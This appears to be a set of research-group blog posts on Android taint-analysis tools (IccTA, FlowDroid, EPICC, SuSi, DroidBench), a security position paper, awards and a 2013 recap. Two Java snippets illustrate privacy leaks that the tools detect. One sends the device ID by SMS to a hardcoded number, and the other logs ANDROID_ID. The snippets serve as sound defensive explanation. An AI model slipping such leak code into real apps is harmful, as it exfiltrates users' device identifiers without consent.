IccTA vs. DidFail: Inter-Component, Inter-Application Data Flow Analysis in Android Applications

We are happy to announce IccTA, a new tool for tracking data flows between Android components and even between Android applications. IccTA is joint work with Li Li, Alexandre Bartel, Jacques Klein and Yves Le Traon from the University of Luxembourg, Damien Octeau and Patrick McDaniel from the Pennsylvania State University, and Steven Arzt, Siegfried Rasthofer and Eric Bodden from EC SPRIDE. IccTA performs static taint analysis on one or multiple Android applications. It leverages Epicc to connect Android components and FlowDroid to model the component life-cycles and perform the taint analysis.

The taint analysis is performed both within and across components, which improves the precision of the analysis. IccTA outperforms all other available tools (FlowDroid and AppScan) by reaching a precision of 95.0% and a recall of 82.6% on DroidBench.
When analyzing multiple applications, IccTA first merges them into a single application and then performs the analysis on the merged result.
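To illustrate what such an inter-component leak looks like, here is a minimal sketch of the kind of flow IccTA is designed to detect (the class names and the extra key are made up for illustration, and the code assumes the READ_PHONE_STATE and SEND_SMS permissions): one activity reads the device ID and forwards it through an Intent, and a second activity receives the value and sends it out via SMS.

import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;

// Source component: reads sensitive data and passes it on via an Intent.
public class SourceActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        TelephonyManager tm = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
        String deviceId = tm.getDeviceId();                 // source: the device ID
        Intent intent = new Intent(this, SinkActivity.class);
        intent.putExtra("secret", deviceId);                // tainted data crosses the component boundary
        startActivity(intent);
    }
}

// Sink component: receives the tainted extra and leaks it via SMS.
class SinkActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        String secret = getIntent().getStringExtra("secret");
        SmsManager.getDefault().sendTextMessage("+491234567890", null, secret, null, null); // sink
    }
}

An intra-component analysis alone only sees the putExtra call in the first activity and the getStringExtra call in the second; it is the link between the two components, computed by Epicc, that lets IccTA connect the source to the sink.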

At almost exactly the same time, an additional tool called DidFail appeared from Carnegie Mellon University, which follows a similar approach to IccTA.
IccTA and DidFail both rely on Epicc and FlowDroid to find data leaks between components of Android applications. They can both detect intra- and inter-component leaks within a single application or between multiple applications. Even though they leverage the same tools to compute links between components and to perform the data-flow analysis, the implementations differ in terms of precision.

In the full post, we give a rough comparison of both tools.

Seven Points for More Software Security

The current Heartbleed vulnerability shows how important it is to improve the security of software. IT experts discussed concrete recommendations for action at the Eberbacher Gespräch on Software Security. Besides the development of better testing tools, the participants call for software security to be given more weight in public tenders, as well as a discussion of liability questions. The Fraunhofer Institute for Secure Information Technology SIT has now published the results in a report that describes the most important challenges and suitable approaches to solving them. The position paper can be downloaded here free of charge.

Software today is so complex that people cannot detect even serious flaws despite intensive review. In the Heartbleed case, too, the reviewer did not notice the bug. This was open-source software, whose program code is even publicly viewable and verifiable. As with many open-source projects, companies used the free code and thus unintentionally spread the flaw. "The example shows how important it is to check the security quality of program code more thoroughly before using it, and how dangerous the use of third-party code is," says Prof. Michael Waidner, head of Fraunhofer SIT and director of the European Center for Security and Privacy by Design (EC SPRIDE). "Even if it is not yet clear what damage the vulnerability has caused, the example shows once again that it is much more expensive to fix software bugs after the fact than to eliminate them during the development phase."

To promote the development of secure software, the participants of the Eberbacher Gespräch drew up seven concrete recommendations. Besides settling the liability question, these include the development of flexible security processes that are also suitable for small and medium-sized software vendors. In addition to better training for programmers, procurement guidelines for public authorities should be changed so that minimum IT-security requirements have to be met. To give companies an incentive to improve the security of the software they use, managers must be able to calculate the cost benefits of secure software, for instance with the help of new quantitative models. Beyond that, the participants see a need for new certification methods that keep pace with the rapid speed of software development, as well as new tools for vulnerability analysis. "German research is particularly strong in the area of automated testing tools," says Michael Waidner. "New methods make it possible, for example, to find bugs in program code faster and more reliably. The task now is to turn these approaches into products." In the long run, clarifying the liability question could also have a positive effect on IT security and data protection. (Oliver Küch, Fraunhofer SIT)

FlowDroid receives Artifact Evaluation Award

Our taint-analysis framework FlowDroid was awarded the Artifact Evaluation Award at PLDI 2014. This year, out of 20 submitted artifacts, only 12 were found to meet or exceed expectations and were awarded accordingly. For FlowDroid, we apparently exceeded the expectations of all three reviewers. Thanks a lot to Christian Fritz for the initial implementation and to Steven Arzt for turning it into such a polished distribution!

Are you using our tools? Please let us know!

Over the past few years, we have developed and open-sourced a whole range of program-analysis tools surrounding the Soot framework. Are you using Soot or any related tools?

Then please let us know by briefly filling out this form. It will not even take a minute!

This will help us when applying for funding from funding agencies, and it will in turn help you, by allowing us to keep up the level of support that we have provided so far.

Many thanks in advance!

DFG awards Eric Bodden the Heinz Maier-Leibnitz Prize

The Deutsche Forschungsgemeinschaft (DFG) has awarded Eric Bodden the Heinz Maier-Leibnitz Prize 2014. The Heinz Maier-Leibnitz Prize, named after the physicist and former president of the DFG, is a distinction for young researchers and provides further incentive for excellent achievements in their research work. Every year, up to 10 researchers in Germany are awarded this prize.

More information is available here (in German).

Google Confirms Denial-of-“App” Attack – Likely All Android Versions Affected

Together with their colleague Stephan Huber from Fraunhofer SIT, Steven Arzt and Siegfried Rasthofer from the SSE group discovered a security issue present in all current versions of Android. As Google has now confirmed, the attack vector allows an attacker to block the future installation of arbitrary Android apps of their choice. For instance, it can be used to block the installation of the Facebook app for essentially the entire lifetime of the mobile device, until a factory reset has been performed or the issue is fixed manually, which, however, requires root access to the device and some expertise in the Android OS. Update: The attack itself requires no root access.

We tested the attack on Android versions 4.x and 2.3.6; it is likely, however, that this attack affects ALL Android versions. We wish to note that this vulnerability was discovered under lab conditions and that there is currently no indication that it is being exploited in the wild.

We are currently in contact with the Android security team to fix this problem. A detailed explanation of the attack will be published after a fix is available.

A recap on our research progress in 2013

2013 was an exciting year for me. It was the first full year I had with my new set of PhD students, whom I had hired through EC SPRIDE and through my Emmy Noether Research Group RUNSECURE. Also, 2013 was the year in which I started a cooperative professorship with Fraunhofer SIT, an exciting new challenge with the opportunity to bring academic research into industry. Last but not least, it was the first year in which we actually managed to place publications at top security venues such as USENIX Security and NDSS. But let me start from the beginning.

The year started great with our paper on Join Point Interfaces getting accepted into TOSEM. This paper (for now) marks the final word on this research topic, which I had been working on with Eric Tanter and Milton Inostroza from the University of Chile for more than two years.

Just a few days later, we got the notification that our paper SPLLIFT: statically analyzing software product lines in minutes instead of years had been accepted into PLDI. This is joint work with Társis Tolêdo, Márcio Ribeiro, Claus Brabrand, Paulo Borba and Mira Mezini, and it is work I am extremely proud of. Not only could we show in this paper that one can really speed up the execution of IFDS-based static analyses for product lines by several orders of magnitude in practice; after further investigation it even seems that our approach lowers the theoretical complexity of the analysis problem from exponential in the number of features to linear. Expect to see a follow-up implementation on this topic.

In March we then received our Google Faculty Research Award, together with the groups of Patrick McDaniel (Penn State) and Yves le Traon (University of Luxembourg). The award will allow us to build a map of how Android applications communicate with one another. The project has already led to some much-cited publications. Our USENIX paper is on a static-analysis tool called EPICC, which is able to resolve intent-based inter-component communication in Android in most cases. In other words, the tool will tell you which app(s) a given intent-call site in a given app might call. FlowDroid has received at least as much attention. FlowDroid is our static taint-analysis tool for Android. It seems to be the most precise and efficient Android taint-analysis tool out there, and, most importantly, it is the only one that is actually available as open source. We open-sourced FlowDroid after having to learn the hard way that no other research tools were actually available. Since making FlowDroid available online, it has been used and extended by multiple research groups. The FlowDroid paper, unfortunately, is still waiting to be published. Apparently, PCs at security conferences prefer papers with weak tools but big data over papers with sophisticated tools and a careful evaluation…
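To make the intent-resolution problem concrete, here is a minimal sketch of the kind of call site EPICC reasons about (the action string, extra key and class name are made up for illustration). The implicit intent below names no target component, so which activity, possibly in another app, receives it depends on the intent filters declared by the installed apps; EPICC statically computes the possible targets of exactly such calls.

import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;

public class SenderActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Implicit intent: the target is chosen by action (and category/data) matching,
        // not by naming a concrete class.
        Intent intent = new Intent("com.example.SHOW_PROFILE");
        intent.putExtra("userId", "42");
        startActivity(intent);   // the intent-call site whose possible targets EPICC computes
    }
}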

One piece of work we did manage to place at a security conference, though, is SuSi, our new machine-learning approach for inferring sources and sinks for Android taint analyses, a project headed by my PhD students Siegfried Rasthofer and Steven Arzt. This approach addresses the fundamental problem that no matter which taint analysis you use, it is only going to be as effective as your source and sink specifications. As we found, for all existing taint analyses these specifications are largely incomplete, and thus all those tools can be bypassed with ease. SuSi determines and even categorizes relevant sources and sinks with 95% accuracy, which solves the problem to a large extent. In practice we use SuSi in combination with FlowDroid. Just like FlowDroid, SuSi is open source.
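As a minimal sketch of why the completeness of these specifications matters (the class name is made up for illustration): if an analysis's list of sources does not include Settings.Secure.getString() and its list of sinks does not include the Android log, the leak below goes entirely unnoticed, no matter how precise the underlying taint tracking is.

import android.app.Activity;
import android.os.Bundle;
import android.provider.Settings;
import android.util.Log;

public class QuietLeakActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // A less obvious source: the device's ANDROID_ID.
        String androidId = Settings.Secure.getString(
                getContentResolver(), Settings.Secure.ANDROID_ID);
        // A less obvious sink: the system log, which other apps could read
        // with the READ_LOGS permission on older Android versions.
        Log.i("ids", androidId);
    }
}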

Another project that got a lot of attention is DroidBench, our benchmark suite for testing the effectiveness of taint analyses for Android applications. DroidBench is open source, and, as we hoped, people have started to extend it and to pick it up for testing their own security-analysis tools.

Another recent and still unpublished work, by my PhD student Andreas Follner, is ROPocop, our new approach to defending against buffer-overflow attacks based on return-oriented programming. The approach works on x86 Windows binaries through dynamic binary instrumentation. ROPocop applies a well-tuned heuristic to detect ROP attacks with great accuracy (and no false alarms in our tests).

Also, Kevin Falzon presented a paper on Distributed Finite-State Runtime Monitoring with Aggregated Events at this year's RV conference. His work is quite exciting in scenarios where one tries to implement distributed runtime monitoring under high load. Kevin's work evaluates to what extent one may aggregate events before submitting them to a centralized monitor, such that one can speed up the overall monitoring process.

Steven Arzt further developed Reviser, an approach for automatically incrementalizing IFDS/IDE-based static analyses. As we could show, using incremental evaluation of program updates, one can often save about 80% of re-computation time. This work is currently under submission.

Last but not least, our Future-Security paper on Reducing human factors in software security architectures investigates several software security architectures, including Java, .NET and JavaScript, and the extent to which they are prone to human error. This is joint work with Ben Hermann, Johannes Lerch and Mira Mezini. The four of us are also currently working on a static analysis to detect security vulnerabilities in the Java Runtime Library. On this topic we were just awarded an Oracle Collaborative Research Grant. Thanks a lot to Michael Haupt, Cristina Cifuentes and Andrew Gross for supporting this initiative!

So much for 2013, but what can be expected from 2014? Well, this summer I won an Attract Grant to establish a new research group at Fraunhofer SIT, so my first task will be to staff this group with some highly skilled people, not an easy undertaking in today's job market. The goal of this group will be to make static analysis really work in practice, and we will do whatever it takes to make this happen. We have already been targeting this goal for about a year now, and it has already yielded some very exciting research problems. So stay tuned for more. Until then, I wish you all wonderful Christmas holidays and a happy and successful 2014!